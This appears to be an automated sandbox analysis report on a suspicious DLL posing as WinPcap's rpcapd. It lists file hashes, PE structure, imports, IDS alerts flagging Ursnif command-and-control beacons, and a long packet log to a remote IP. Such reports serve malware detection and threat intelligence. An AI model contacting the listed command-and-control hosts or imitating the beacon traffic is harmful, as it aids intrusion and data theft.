SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371 |
Entropy (8bit): | 5.249019234797919 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fNn0zxs7+AEszI923fXH:p37Lvkmb6KzN0WZE2v |
MD5: | F28E2C87B12035961456125647878FCE |
SHA1: | 6F55949A828C2B465A50A45C6C71FA3C01A3BDCE |
SHA-256: | 5B68794520547EA8882EBC7A84C4366A01EB2392313037DD1B2F8B0B6DFFFB30 |
SHA-512: | AA2DAC61F09E0EE93261701B2881E645FF000836C6F291E3F75773D24860217860D2A87A8B29062C31BEBEB4347DA4D474271E36AA6EA1AF911D844AADB5FAEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6530037012560004 |
Encrypted: | false |
SSDEEP: | 24:etGSIMWWOJy853Ek0s2E7OgkdWQzbtkZf1mOWI+ycuZhNtakSbPNnq:6Kvz5UkGE7v2WQzqJ1m11ulta3Rq |
MD5: | E00BC379F4F3CAAAE28A855CBA000F3A |
SHA1: | 2F2AFF2B7C7AD9D1EDE37E66F7CA2F071F3DC7C1 |
SHA-256: | 28E97F3EC717884B7058865891248914DA5DD87C0B88E57E321B4EC5A39C3FD0 |
SHA-512: | 47394F7F97B84050693B758939C8C57DFAFEE9E11714AEC31E7A43593D92EAD5B1DE46B0581B9F1F34582BDB3C9E26246BBDE94ACABA0203201EAA5DC9E98FD7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 868 |
Entropy (8bit): | 5.336626837702438 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KzNVE2WKaM5DqBVKVrdFAMBJTH:Akka6arE2WKxDcVKdBJj |
MD5: | DB810852324B71057176ED36F2CA1695 |
SHA1: | 713996E9A782D6855EE1478FD42E7805D09C4A93 |
SHA-256: | 5B22C0AB30D90381ADF759C4D158F834E885757D62A889E1EC714AE99875F44D |
SHA-512: | 79F2ED62FF95B48C4E1F26A2AF8845FE6BBFC0D7F69563C76E76C79C2DA3960068228164BF20AB849FC65B24298D950CB46FB36C7D83707ED812AE336AC41DBA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.121923247223275 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0lyak7YnqqXlTPN5Dlq5J:+RI+ycuZhNXakSZPNnqX |
MD5: | 4B7B3DAD3367B7883885AE92CC2022A8 |
SHA1: | 4AB6E72835EF2BD6D9846FF139DE59289E97B3D1 |
SHA-256: | 969A0F960763778F331C1CFB2FF57CA4696E3A7EDAE689A3F0BD9F40A12D3C1F |
SHA-512: | 1E8AD8BFD152023AF10B6D9A725282C1FD2CFAA6172E575B66471D6D695991B915BBF5DFB571C47E2DE640F1E8D7EB39B502B12A359A7038A8BEF90DCAE3094B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 371 |
Entropy (8bit): | 5.302952125242329 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923filzxs7+AEszI923fiW9n:p37Lvkmb6KzKWZE2B9 |
MD5: | 4023D8D689AEED7AD6BA5A8D55E73792 |
SHA1: | 624E325D40A40C0E16FDC537DB9A1E37319394F2 |
SHA-256: | 128109BC2099C5A84A35768FA9F4A64DBF7920B09E1BE9312703554DC63FCD10 |
SHA-512: | F63FE1FD497662D350C1A921600CE34A6088258938A6809A5EBC2C00275F81351E6922CDCBFF65891B5DD376865C8531E0D15FDFE7E3526530AAFA7385B7223C |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6409513225199364 |
Encrypted: | false |
SSDEEP: | 24:etGSK8+mUE7R853RY0kCG7J+4I4tkZfHqug3DZ0WI+ycuZhNXakSZPNnq:6EXE7S50WJHq3ZX1ulXa3bq |
MD5: | 67D7212A2B15084D3B6FA70F16AFDD6C |
SHA1: | 743A096BCF4E42AB064F5139488194811EF23782 |
SHA-256: | 878B7E2B251C062F95F45B18FE7248D95EA378707CFDFFB0A6043B134B463761 |
SHA-512: | 992DB5E31B77859DC273C344444A5A93963F16BA9796F261197E2D4F9FBF6AC194DD29A7261D5A53A2BE79226F9E547E1D7EEF0456EC50CAEAF1ACFDE033F848 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 868 |
Entropy (8bit): | 5.35568353482419 |
Encrypted: | false |
SSDEEP: | 12:xKIR37Lvkmb6KzKWZE2B4KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzrE2WKaM5DqBVKVrdFAMBJTH |
MD5: | D8D7A68D20996F61BC72BD192FB1D83C |
SHA1: | 92F7412CE0E44D88FEE4D91B1003D435385BF7EE |
SHA-256: | 1D14F98EF405654C358851C49324CDBD3FABAE5F2213B38D652C01CE24AA01B4 |
SHA-512: | A51C5EC8636040C299D6F6A2E8053B47AC6EF5B3830CE875257F27FC98448FC9195A317E723A793B0115E091BA49A3056667FA8E3605D89B97FA3B10599BFA9F |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220422\PowerShell_transcript.701188.6Ui9L_aX.20220422181317.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1357 |
Entropy (8bit): | 5.3549203065751 |
Encrypted: | false |
SSDEEP: | 24:BxSABDvBBRJNzx2DOXUWndxSXLCHgo4qWnHjeTKKjX4CIym1ZJXLdxSXLCHgo4Ui:BZJv/TZoO9pb4tnqDYB1Zvpb4iZZ+ |
MD5: | 8F2C181896931A924F0038005408C3D7 |
SHA1: | DB9E8BEF4B235EE727DB7754F9B8884403C420CB |
SHA-256: | FF8A78A7E137AE094866B5F6C45363A3AFDC5E3E7069033961BFCC760ED2B1DF |
SHA-512: | 634578FD917A2633DD4E58F706DC141E71BE8B88E56724D05817BE8AACA4951376C6E1A8054FC2F7864E8A6D9E16A97496DCAD6196A6121A871BC09D6DB193B0 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.116107290295018 |
TrID: |
|
File name: | nhLAwAo49f.dll |
File size: | 641494 |
MD5: | 117d2886bf0e722b91c0613f337e97da |
SHA1: | ca858266bb3a6c30bd798bd52ec9ad5f5992c999 |
SHA256: | 5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37 |
SHA512: | bbbcef3522fbfac490a21803c5fab3968f18b5e9ed41db45f4617de4db016a11aae7a8c18ecf6bd189257e1a8e7cf0743d2bd1ecb5ccecf1af1160b4f69dbe2f |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8Zlh:+w1lEKOpuYxiwkkgjAN8Z/ |
TLSH: | ABD4BD1A029B2102EBB6CE78A751636C55170CE09B01E2CFC9190DA395E35FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Instruction |
---|
jmp 00007F5880CB05CDh |
jmp 00007F5880CE0D38h |
jmp 00007F5880CB02B3h |
jmp 00007F5880CAFF6Eh |
jmp 00007F5880CB0389h |
jmp 00007F5880CAFDC4h |
jmp 00007F5880CE61AFh |
jmp 00007F5880CAFECAh |
jmp 00007F5880CD9525h |
jmp 00007F5880CE93E0h |
jmp 00007F5880CE504Bh |
jmp 00007F5880CEA5A6h |
jmp 00007F5880CAFE41h |
jmp 00007F5880CDA65Ch |
jmp 00007F5880CECC77h |
jmp 00007F5880CE3F22h |
jmp 00007F5880CDB6DDh |
jmp 00007F5880CB02F8h |
jmp 00007F5880CEFC13h |
jmp 00007F5880CB001Eh |
jmp 00007F5880CEB7D9h |
jmp 00007F5880CE1E04h |
jmp 00007F5880CDC6EFh |
jmp 00007F5880CEB5FAh |
jmp 00007F5880CB0295h |
jmp 00007F5880CE71D0h |
jmp 00007F5880CDEC2Bh |
jmp 00007F5880CEED36h |
jmp 00007F5880CDDAF1h |
jmp 00007F5880CB028Ch |
jmp 00007F5880CAFE07h |
jmp 00007F5880CE8312h |
jmp 00007F5880CEDC8Dh |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
int3 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data |
DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |
Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/22/22-18:13:04.407179 04/22/22-18:13:04.407179 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
04/22/22-18:12:43.292918 04/22/22-18:12:43.292918 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49758 | 80 | 192.168.2.5 | 13.107.42.16 |
04/22/22-18:13:05.383399 04/22/22-18:13:05.383399 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
04/22/22-18:13:03.616504 04/22/22-18:13:03.616504 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 22, 2022 18:13:03.589531898 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.615566015 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.615808964 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.616503954 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.643296957 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994354963 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994388103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994402885 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994417906 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994436026 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994443893 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994450092 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994469881 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994502068 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994559050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994601011 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994689941 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994702101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994748116 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994818926 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994837046 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994848967 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994856119 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994877100 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.994941950 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.994978905 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:03.995069981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:03.995109081 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.034974098 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.034996033 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035008907 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035026073 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035039902 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035048962 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035093069 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035511017 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035528898 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035540104 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035558939 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035586119 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035588026 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035598993 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035643101 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035742044 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035761118 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035772085 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035789013 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035806894 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035816908 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035820007 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035830975 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035836935 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.035844088 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035868883 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.035904884 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.059910059 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.060010910 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.074975967 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.074997902 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075010061 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075026989 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075074911 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075103045 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075443029 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075462103 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075473070 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075490952 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075509071 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075560093 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075582981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075601101 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075613022 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075644970 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075669050 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075681925 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075696945 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075709105 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075750113 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075766087 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075799942 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075815916 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075828075 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.075849056 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.075874090 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.083607912 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.083715916 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115084887 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115109921 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115120888 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115134001 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115147114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115158081 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115223885 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115266085 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115417004 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115436077 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115446091 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115462065 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115484953 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115506887 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115519047 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115530968 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115535021 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115587950 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115869045 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115886927 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115897894 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115915060 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115931034 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115943909 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.115962982 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115988970 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.115995884 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.116130114 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
Apr 22, 2022 18:13:04.116199017 CEST | 49773 | 80 | 192.168.2.5 | 146.70.35.138 |
Apr 22, 2022 18:13:04.154901981 CEST | 80 | 49773 | 146.70.35.138 | 192.168.2.5 |
